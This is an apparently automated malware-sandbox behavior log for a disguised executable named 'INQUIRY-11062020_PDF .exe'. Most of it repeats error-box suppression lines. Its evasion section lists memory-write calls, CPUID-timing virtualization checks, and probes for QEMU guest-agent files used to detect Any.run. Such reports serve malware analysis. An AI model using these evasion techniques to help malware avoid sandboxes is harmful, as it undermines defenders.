          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeProcess information set: NOGPFAULTERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E8484 NtWriteVirtualMemory,0_2_020E8484
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3801 NtWriteVirtualMemory,0_2_020E3801
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3648 NtWriteVirtualMemory,0_2_020E3648
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3E7A NtWriteVirtualMemory,0_2_020E3E7A
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E4315 NtWriteVirtualMemory,0_2_020E4315
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E7357 NtWriteVirtualMemory,0_2_020E7357
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E6F55 NtWriteVirtualMemory,0_2_020E6F55
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E4173 NtWriteVirtualMemory,0_2_020E4173
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E71FE NtWriteVirtualMemory,0_2_020E71FE
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E1FF9 NtWriteVirtualMemory,0_2_020E1FF9
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E8484 NtWriteVirtualMemory,0_2_020E8484
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3801 NtWriteVirtualMemory,0_2_020E3801
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3648 NtWriteVirtualMemory,0_2_020E3648
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E3E7A NtWriteVirtualMemory,0_2_020E3E7A
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E4315 NtWriteVirtualMemory,0_2_020E4315
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E7357 NtWriteVirtualMemory,0_2_020E7357
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E6F55 NtWriteVirtualMemory,0_2_020E6F55
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E4173 NtWriteVirtualMemory,0_2_020E4173
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E71FE NtWriteVirtualMemory,0_2_020E71FE
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 0_2_020E1FF9 NtWriteVirtualMemory,0_2_020E1FF9
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_005630D1 LdrInitializeThunk,RtlAddVectoredExceptionHandler,LdrInitializeThunk,NtProtectVirtualMemory,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,8_2_005630D1
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00563E7A LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_00563E7A
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_005638DC LdrInitializeThunk,LdrInitializeThunk,8_2_005638DC
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00568484 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_00568484
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00567357 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_00567357
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_0056357C LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_0056357C
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00566F60 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LoadLibraryA,8_2_00566F60
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00564315 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_00564315
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_005671FE LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_005671FE
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeCode function: 8_2_00561FF9 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,8_2_00561FF9
          Tries to detect Any.runShow sources
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
          Source: C:\Users\user\Desktop\INQUIRY-11062020_PDF .exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
